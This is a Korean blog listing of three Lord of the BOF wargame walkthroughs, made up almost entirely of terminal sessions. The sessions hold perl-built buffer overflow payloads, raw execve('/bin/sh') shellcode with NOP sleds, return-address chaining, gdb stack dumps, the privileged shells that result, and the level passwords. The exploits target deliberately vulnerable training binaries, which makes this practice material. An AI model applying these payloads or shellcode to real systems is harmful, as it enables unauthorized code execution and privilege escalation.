'분류 전체보기' 카테고리의 글 목록 (5 Page)

zombie_assassin -> succubus

Wargame/LOB (Redhat9) 2014. 2. 20. 15:39

[zombie_assassin@localhost zombie_assassin]$ ./succubus `perl -e 'print "a"x44,"\xec\x87\x04\x08","\xbc\x87\x04\x08","\x8c\x87\x04\x08","\x5c\x87\x04\x08","\x24\x87\x04\x08","bbbb","\x58\xfa\xff\xbf","/bin/sh"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa?펶??\?$?bbbbX??bin/sh
welcome to the DO!
welcome to the GYE!
welcome to the GUL!
welcome to the YUT!
welcome to the MO!
bash$ my-pass
euid = 517
here to stay
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

nightmare -> xavius (0)	2014.02.20
succubus -> nightmare (0)	2014.02.20
assassin -> zombie_assassin (0)	2014.02.20
giant -> assassin (0)	2014.02.20
bugbear -> giant (0)	2014.02.20

Posted by windowhan

,

assassin -> zombie_assassin

Wargame/LOB (Redhat9) 2014. 2. 20. 15:39

Xshell 4 (Build 0127)
Copyright (c) 2002-2013 NetSarang Computer, Inc. All rights reserved.

Type `help' to learn how to use Xshell prompt.
Xshell:\>

Connecting to 192.168.232.128:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
                                            _______________________
_______________________-------------------                       `\
/:--__                                                              |
||< > |                                   ___________________________/
| \__/_________________-------------------                         |
|                                                                  |
|        The Lord of the BOF : The Fellowship of the BOF, 2010    |
|                                                                  |
|                                                                  |
|       [enter to the dungeon]                                    |
|       gate : gate                                                |
|                                                                  |
|       [RULE]                                                     |
   |      - do not use local root exploit                             |
   |      - do not use LD_PRELOAD to my-pass                          |
   |      - do not use single boot                    [h4ck3rsch001] |
|                                              ____________________|_
| ___________________-------------------------                      `\
|/`--_                                                                 |
||[ ]||                                            ___________________/
   \===/___________________--------------------------

login: assassin
Password:
Last login: Fri Sep 6 14:24:49 from 192.168.232.1
[assassin@localhost assassin]$ bash2
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ ls
core fs fs.c zombie_assassin
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵?.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x0 in ?? ()
(gdb) x/1000s 0xbffffb00
0xbffffb00:     "\225?엔?풾??205?엔?옇?왠?욍?웡??016?026???풪?퓀?오왔?
0xbffffb51:     ""
0xbffffb52:     ""
0xbffffb53:     ""
0xbffffb54:     "\003"
0xbffffb56:     ""
0xbffffb57:     ""
0xbffffb58:     "4\200\004\b\004"
0xbffffb5e:     ""
0xbffffb5f:     ""
0xbffffb60:     " "
0xbffffb62:     ""
0xbffffb63:     ""
0xbffffb64:     "\005"
0xbffffb66:     ""
0xbffffb67:     ""
0xbffffb68:     "\006"
0xbffffb6a:     ""
0xbffffb6b:     ""
0xbffffb6c:     "\006"
0xbffffb6e:     ""
0xbffffb6f:     ""
0xbffffb70:     ""
0xbffffb71:     "\020"
0xbffffb73:     ""
0xbffffb74:     "\a"
0xbffffb76:     ""
0xbffffb77:     ""
0xbffffb78:     ""
0xbffffb79:     ""
---Type <return> to continue, or q <return> to quit---
0xbffffb7a:     ""
0xbffffb7b:     "@\b"
0xbffffb7e:     ""
0xbffffb7f:     ""
0xbffffb80:     ""
0xbffffb81:     ""
0xbffffb82:     ""
0xbffffb83:     ""
0xbffffb84:     "\t"
0xbffffb86:     ""
0xbffffb87:     ""
0xbffffb88:     "\220\203\004\b\013"
0xbffffb8e:     ""
0xbffffb8f:     ""
0xbffffb90:     "\003\002"
0xbffffb93:     ""
0xbffffb94:     "\f"
0xbffffb96:     ""
0xbffffb97:     ""
0xbffffb98:     "\003\002"
0xbffffb9b:     ""
0xbffffb9c:     "\r"
0xbffffb9e:     ""
0xbffffb9f:     ""
0xbffffba0:     "\003\002"
0xbffffba3:     ""
0xbffffba4:     "\016"
0xbffffba6:     ""
0xbffffba7:     ""
0xbffffba8:     "\003\002"
---Type <return> to continue, or q <return> to quit---
0xbffffbab:     ""
0xbffffbac:     "\020"
0xbffffbae:     ""
0xbffffbaf:     ""
0xbffffbb0:     "魂\017\017"
0xbffffbb6:     ""
0xbffffbb7:     ""
0xbffffbb8:     "珹?
0xbffffbbd:     ""
0xbffffbbe:     ""
0xbffffbbf:     ""
0xbffffbc0:     ""
0xbffffbc1:     ""
0xbffffbc2:     ""
0xbffffbc3:     ""
0xbffffbc4:     ""
0xbffffbc5:     ""
0xbffffbc6:     ""
0xbffffbc7:     ""
0xbffffbc8:     ""
0xbffffbc9:     ""
0xbffffbca:     ""
0xbffffbcb:     ""
0xbffffbcc:     ""
0xbffffbcd:     ""
0xbffffbce:     ""
0xbffffbcf:     ""
0xbffffbd0:     ""
0xbffffbd1:     ""
0xbffffbd2:     ""
---Type <return> to continue, or q <return> to quit---
0xbffffbd3:     ""
0xbffffbd4:     ""
0xbffffbd5:     ""
0xbffffbd6:     ""
0xbffffbd7:     ""
0xbffffbd8:     ""
0xbffffbd9:     ""
0xbffffbda:     ""
0xbffffbdb:     ""
0xbffffbdc:     ""
0xbffffbdd:     ""
0xbffffbde:     ""
0xbffffbdf:     ""
0xbffffbe0:     "i686"
0xbffffbe5:     "./zombie_assassin"
0xbffffbf7:     "aaaa?212\005@bbbb廈\017@", 'b' <repeats 24 times>, "釵?
0xbffffc24:     "PWD=/home/assassin/tmp"
0xbffffc3b:     "REMOTEHOST=192.168.232.1"
0xbffffc54:     "HOSTNAME=localhost.localdomain"
0xbffffc73:     "LESSOPEN=|/usr/bin/lesspipe.sh %s"
0xbffffc95:     "USER=assassin"
0xbffffca3:     "LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:bd=40;33;01:cd=40;33;01:or=01;05;37;41:mi=01;05;37;41:ex=01;32:*.cmd=01;32:*.exe=01;32:*.com=01;32:*.btm=01;32:*.bat=01;32:*.sh=01;32:*.csh=01"...
0xbffffd6b:     ";32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.bz=01;31:*.tz=01;31:*.rpm=01;31:*.cpio=01;31:*.jpg=01;35:*.gif=01;35:*.bmp=01;3"...
0xbffffe33:     "5:*.xbm=01;35:*.xpm=01;35:*.png=01;35:*.tif=01;35:"
0xbffffe66:     "MACHTYPE=i386-redhat-linux-gnu"
0xbffffe85:     "MAIL=/var/spool/mail/assassin"
0xbffffea3:     "INPUTRC=/etc/inputrc"
0xbffffeb8:     "BASH_ENV=/home/assassin/.bashrc"
---Type <return> to continue, or q <return> to quit---ㅂ
0xbffffed8:     "LANG=en_US"
0xbffffee3:     "DISPLAY=192.168.232.1:0.0"
0xbffffefd:     "LOGNAME=assassin"
0xbfffff0e:     "SHLVL=2"
0xbfffff16:     "USERNAME="
0xbfffff20:     "SHELL=/bin/bash"
0xbfffff30:     "HOSTTYPE=i386"
0xbfffff3e:     "HISTSIZE=1000"
0xbfffff4c:     "OSTYPE=linux-gnu"
0xbfffff5d:     "TERM=xterm"
0xbfffff68:     "HOME=/home/assassin"
0xbfffff7c:     "PATH=/usr/local/bin:/bin:/usr/bin:/usr/X11R6/bin:/home/assassin/bin"
0xbfffffc0:     "_=./zombie_assassin"
0xbfffffd4:     "OLDPWD=/home/assassin"
0xbfffffea:     "./zombie_assassin"
0xbffffffc:     ""
0xbffffffd:     ""
0xbffffffe:     ""
0xbfffffff:     ""
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
0xc0000000:     <Address 0xc0000000 out of bounds>
---Type <return> to continue, or q <return> to quit---q
Quit
(gdb) x/100x 0xbfffffb7
0xbfffffb7:     0x6e697373     0x6e69622f     0x2e3d5f00     0x6d6f7a2f
0xbfffffc7:     0x5f656962     0x61737361     0x6e697373     0x444c4f00
0xbfffffd7:     0x3d445750     0x6d6f682f     0x73612f65     0x73736173
0xbfffffe7:     0x2e006e69     0x6d6f7a2f     0x5f656962     0x61737361
0xbffffff7:     0x6e697373     0x00000000     Cannot access memory at address 0xbfffffff
(gdb) x/100x 0xbffffbf7
0xbffffbf7:     0x61616161     0x40058ae0     0x62626262     0x400fbff9
0xbffffc07:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc17:     0x62626262     0x62626262     0xbffffbf3     0x44575000
0xbffffc27:     0x6f682f3d     0x612f656d     0x73617373     0x2f6e6973
0xbffffc37:     0x00706d74     0x4f4d4552     0x4f484554     0x313d5453
0xbffffc47:     0x312e3239     0x322e3836     0x312e3233     0x534f4800
0xbffffc57:     0x4d414e54     0x6f6c3d45     0x686c6163     0x2e74736f
0xbffffc67:     0x61636f6c     0x6d6f646c     0x006e6961     0x5353454c
0xbffffc77:     0x4e45504f     0x752f7c3d     0x622f7273     0x6c2f6e69
0xbffffc87:     0x70737365     0x2e657069     0x25206873     0x53550073
0xbffffc97:     0x613d5245     0x73617373     0x006e6973     0x435f534c
0xbffffca7:     0x524f4c4f     0x6f6e3d53     0x3a30303d     0x303d6966
0xbffffcb7:     0x69643a30     0x3b31303d     0x6c3a3433     0x31303d6e
0xbffffcc7:     0x3a36333b     0x343d6970     0x33333b30     0x3d6f733a
0xbffffcd7:     0x333b3130     0x64623a35     0x3b30343d     0x303b3333
0xbffffce7:     0x64633a31     0x3b30343d     0x303b3333     0x726f3a31
0xbffffcf7:     0x3b31303d     0x333b3530     0x31343b37     0x3d696d3a
0xbffffd07:     0x303b3130     0x37333b35     0x3a31343b     0x303d7865
0xbffffd17:     0x32333b31     0x632e2a3a     0x303d646d     0x32333b31
0xbffffd27:     0x652e2a3a     0x303d6578     0x32333b31     0x632e2a3a
0xbffffd37:     0x303d6d6f     0x32333b31     0x622e2a3a     0x303d6d74
0xbffffd47:     0x32333b31     0x622e2a3a     0x303d7461     0x32333b31
0xbffffd57:     0x732e2a3a     0x31303d68     0x3a32333b     0x73632e2a
0xbffffd67:     0x31303d68     0x3a32333b     0x61742e2a     0x31303d72
0xbffffd77:     0x3a31333b     0x67742e2a     0x31303d7a     0x3a31333b
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf7\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?
Segmentation fault (core dumped)
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `./zombie_assassin aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb瓣욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...Xshelldone.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) q
[assassin@localhost tmp]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ exit
exit
Segmentation fault (core dumped)
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ Xq
sh: Xq: command not found
bash$ exit
exit
Segmentation fault
[assassin@localhost assassin]$ cd tmp
[assassin@localhost tmp]$ gdb -q ./zombie_assassin ./core
Core was generated by `                  aaaaaaaabbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0 0x62626262 in ?? ()
(gdb) x/100x 0xbffffbf3
0xbffffbf3:     0x61616161     0x61616161     0x62626262     0x400fbff9
0xbffffc03:     0x62626262     0x62626262     0x62626262     0x62626262
0xbffffc13:     0x62626262     0x62626262     0xbffffbf3     0x080484df
0xbffffc23:     0x44575000     0x6f682f3d     0x612f656d     0x73617373
0xbffffc33:     0x2f6e6973     0x00706d74     0x4f4d4552     0x4f484554
0xbffffc43:     0x313d5453     0x312e3239     0x322e3836     0x312e3233
0xbffffc53:     0x534f4800     0x4d414e54     0x6f6c3d45     0x686c6163
0xbffffc63:     0x2e74736f     0x61636f6c     0x6d6f646c     0x006e6961
0xbffffc73:     0x5353454c     0x4e45504f     0x752f7c3d     0x622f7273
0xbffffc83:     0x6c2f6e69     0x70737365     0x2e657069     0x25206873
0xbffffc93:     0x53550073     0x613d5245     0x73617373     0x006e6973
0xbffffca3:     0x435f534c     0x524f4c4f     0x6f6e3d53     0x3a30303d
0xbffffcb3:     0x303d6966     0x69643a30     0x3b31303d     0x6c3a3433
0xbffffcc3:     0x31303d6e     0x3a36333b     0x343d6970     0x33333b30
0xbffffcd3:     0x3d6f733a     0x333b3130     0x64623a35     0x3b30343d
0xbffffce3:     0x303b3333     0x64633a31     0x3b30343d     0x303b3333
0xbffffcf3:     0x726f3a31     0x3b31303d     0x333b3530     0x31343b37
0xbffffd03:     0x3d696d3a     0x303b3130     0x37333b35     0x3a31343b
0xbffffd13:     0x303d7865     0x32333b31     0x632e2a3a     0x303d646d
0xbffffd23:     0x32333b31     0x652e2a3a     0x303d6578     0x32333b31
0xbffffd33:     0x632e2a3a     0x303d6d6f     0x32333b31     0x622e2a3a
0xbffffd43:     0x303d6d74     0x32333b31     0x622e2a3a     0x303d7461
0xbffffd53:     0x32333b31     0x732e2a3a     0x31303d68     0x3a32333b
0xbffffd63:     0x73632e2a     0x31303d68     0x3a32333b     0x61742e2a
0xbffffd73:     0x31303d72     0x3a31333b     0x67742e2a     0x31303d7a
(gdb) x/x 0xbffffbf3
0xbffffbf3:     0x61616161
(gdb)
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb) x/x 0xbffffbf3+4
0xbffffbf7:     0x61616161
(gdb)
0xbffffbfb:     0x62626262
(gdb)
0xbffffbff:     0x400fbff9
(gdb)
0xbffffc03:     0x62626262
(gdb) q
[assassin@localhost tmp]$ cd ../
[assassin@localhost assassin]$ ./zombie_assassin `perl -e 'print "aaaa","\xe0\x8a\x05\x40","bbbb","\xf9\xbf\x0f\x40","b"x24,"\xf3\xfb\xff\xbf","\xdf\x84\x04\x08"'`
aaaa?@bbbb廈@bbbbbbbbbbbbbbbbbbbbbbbb釵욀?
bash$ id
uid=515(assassin) gid=515(assassin) euid=516(zombie_assassin) egid=516(zombie_assassin) groups=515(assassin)
bash$ my-pass
euid = 516
no place to hide
bash$

'Wargame > LOB (Redhat9)' 카테고리의 다른 글

succubus -> nightmare (0)	2014.02.20
zombie_assassin -> succubus (0)	2014.02.20
giant -> assassin (0)	2014.02.20
bugbear -> giant (0)	2014.02.20
darkknight -> bugbear (0)	2014.02.20

Posted by windowhan

,

giant -> assassin

Wargame/LOB (Redhat9) 2014. 2. 20. 15:22

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

기억은 않나지만 ret sleding 으로 풀지않았을까... 생각한다.

Program received signal SIGSEGV, Segmentation fault.
0x0 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x36'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x34'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
co…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGTRAP, Trace/breakpoint trap.
0x40001990 in _start () at rtld.c:142
142     rtld.c: No such file or directory.
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x200,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x60'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x1000 in ?? ()
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x45'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) x/100x 0xbffffd00
0xbffffd00:     0x69616d6f      0x4f4c006e      0x4d414e47      0x69673d45
0xbffffd10:     0x00746e61      0x4f4d4552      0x4f484554      0x313d5453
0xbffffd20:     0x312e3239      0x322e3836      0x312e3232      0x49414d00
0xbffffd30:     0x762f3d4c      0x732f7261      0x6c6f6f70      0x69616d2f
0xbffffd40:     0x69672f6c      0x00746e61      0x4d524554      0x6574783d
0xbffffd50:     0x48006d72      0x5454534f      0x3d455059      0x36383369
0xbffffd60:     0x54415000      0x752f3d48      0x6c2f7273      0x6c61636f
0xbffffd70:     0x6e69622f      0x69622f3a      0x752f3a6e      0x622f7273
0xbffffd80:     0x2f3a6e69      0x2f727375      0x52313158      0x69622f36
0xbffffd90:     0x682f3a6e      0x2f656d6f      0x6e616967      0x69622f74
0xbffffda0:     0x4f48006e      0x2f3d454d      0x656d6f68      0x6169672f
0xbffffdb0:     0x4900746e      0x5455504e      0x2f3d4352      0x2f637465
0xbffffdc0:     0x75706e69      0x00637274      0x4c454853      0x622f3d4c
0xbffffdd0:     0x622f6e69      0x00687361      0x52455355      0x6169673d
0xbffffde0:     0x4200746e      0x5f485341      0x3d564e45      0x6d6f682f
0xbffffdf0:     0x69672f65      0x2f746e61      0x7361622e      0x00637268
0xbffffe00:     0x474e414c      0x5f6e653d      0x4f005355      0x50595453
0xbffffe10:     0x694c3d45      0x0078756e      0x564c4853      0x00313d4c
0xbffffe20:     0x435f534c      0x524f4c4f      0x6f6e3d53      0x3a30303d
0xbffffe30:     0x303d6966      0x69643a30      0x3b31303d      0x6c3a3433
0xbffffe40:     0x31303d6e      0x3a36333b      0x343d6970      0x33333b30
0xbffffe50:     0x3d6f733a      0x333b3130      0x64623a35      0x3b30343d
0xbffffe60:     0x303b3333      0x64633a31      0x3b30343d      0x303b3333
0xbffffe70:     0x726f3a31      0x3b31303d      0x333b3530      0x31343b37
0xbffffe80:     0x3d696d3a      0x303b3130      0x37333b35      0x3a31343b
(gdb) x/100x 0xbffffd00-100
0xbffffc9c:     0x8969622f      0xb0c189e3      0x5351520b      0x80cde189
0xbffffcac:     0x53454c00      0x45504f53      0x2f7c3d4e      0x2f727375
0xbffffcbc:     0x2f6e6962      0x7373656c      0x65706970      0x2068732e
0xbffffccc:     0x55007325      0x4e524553      0x3d454d41      0x53494800
0xbffffcdc:     0x5a495354      0x30313d45      0x48003030      0x4e54534f
0xbffffcec:     0x3d454d41      0x61636f6c      0x736f686c      0x6f6c2e74
0xbffffcfc:     0x646c6163      0x69616d6f      0x4f4c006e      0x4d414e47
0xbffffd0c:     0x69673d45      0x00746e61      0x4f4d4552      0x4f484554
0xbffffd1c:     0x313d5453      0x312e3239      0x322e3836      0x312e3232
0xbffffd2c:     0x49414d00      0x762f3d4c      0x732f7261      0x6c6f6f70
0xbffffd3c:     0x69616d2f      0x69672f6c      0x00746e61      0x4d524554
0xbffffd4c:     0x6574783d      0x48006d72      0x5454534f      0x3d455059
0xbffffd5c:     0x36383369      0x54415000      0x752f3d48      0x6c2f7273
0xbffffd6c:     0x6c61636f      0x6e69622f      0x69622f3a      0x752f3a6e
0xbffffd7c:     0x622f7273      0x2f3a6e69      0x2f727375      0x52313158
0xbffffd8c:     0x69622f36      0x682f3a6e      0x2f656d6f      0x6e616967
0xbffffd9c:     0x69622f74      0x4f48006e      0x2f3d454d      0x656d6f68
0xbffffdac:     0x6169672f      0x4900746e      0x5455504e      0x2f3d4352
0xbffffdbc:     0x2f637465      0x75706e69      0x00637274      0x4c454853
0xbffffdcc:     0x622f3d4c      0x622f6e69      0x00687361      0x52455355
0xbffffddc:     0x6169673d      0x4200746e      0x5f485341      0x3d564e45
0xbffffdec:     0x6d6f682f      0x69672f65      0x2f746e61      0x7361622e
0xbffffdfc:     0x00637268      0x474e414c      0x5f6e653d      0x4f005355
0xbffffe0c:     0x50595453      0x694c3d45      0x0078756e      0x564c4853
0xbffffe1c:     0x00313d4c      0x435f534c      0x524f4c4f      0x6f6e3d53
(gdb) x/100x 0xbffffd00-300
0xbffffbd4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbe4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffbf4:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc04:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc14:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc24:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc34:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc44:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc54:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc64:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc74:     0x90909090      0x90909090      0x90909090      0x90909090
0xbffffc84:     0x90909090      0x90909090      0x90909090      0xc289c031
0xbffffc94:     0x2f6e6850      0x2f686873      0x8969622f      0xb0c189e3
0xbffffca4:     0x5351520b      0x80cde189      0x53454c00      0x45504f53
0xbffffcb4:     0x2f7c3d4e      0x2f727375      0x2f6e6962      0x7373656c
0xbffffcc4:     0x65706970      0x2068732e      0x55007325      0x4e524553
0xbffffcd4:     0x3d454d41      0x53494800      0x5a495354      0x30313d45
0xbffffce4:     0x48003030      0x4e54534f      0x3d454d41      0x61636f6c
0xbffffcf4:     0x736f686c      0x6f6c2e74      0x646c6163      0x69616d6f
0xbffffd04:     0x4f4c006e      0x4d414e47      0x69673d45      0x00746e61
0xbffffd14:     0x4f4d4552      0x4f484554      0x313d5453      0x312e3239
0xbffffd24:     0x322e3836      0x312e3232      0x49414d00      0x762f3d4c
0xbffffd34:     0x732f7261      0x6c6f6f70      0x69616d2f      0x69672f6c
0xbffffd44:     0x00746e61      0x4d524554      0x6574783d      0x48006d72
0xbffffd54:     0x5454534f      0x3d455059      0x36383369      0x54415000
(gdb) r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /home/giant/tmp/assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
c…

Breakpoint 1, 0x804851d in main ()
(gdb) cont
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0xbffffd00 in ?? ()
(gdb) q
The program is running. Exit anyway? (y or n) y
[giant@localhost tmp]$
[giant@localhost tmp]$ r `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
bash: r: command not found
[giant@localhost tmp]$ bash2
[giant@localhost tmp]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
bash$ id
uid=514(giant) gid=514(giant) groups=514(giant)
bash$ q
sh: q: command not found
bash$ exit
exit
[giant@localhost tmp]$ cd ../
[giant@localhost giant]$ ls
assassin assassin.c tmp
[giant@localhost giant]$ finger
Login     Name       Tty      Idle Login Time   Office     Office Phone
giant                pts/0          Jul 30 18:48 (192.168.222.1)
[giant@localhost giant]$ ./assassin `perl -e 'print "\x1e\x85\x04\x08"x37'` `perl -e 'print "\x90"x1000,"\x31\xc0\x89\xc2\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xc1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80"'`
…
bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$

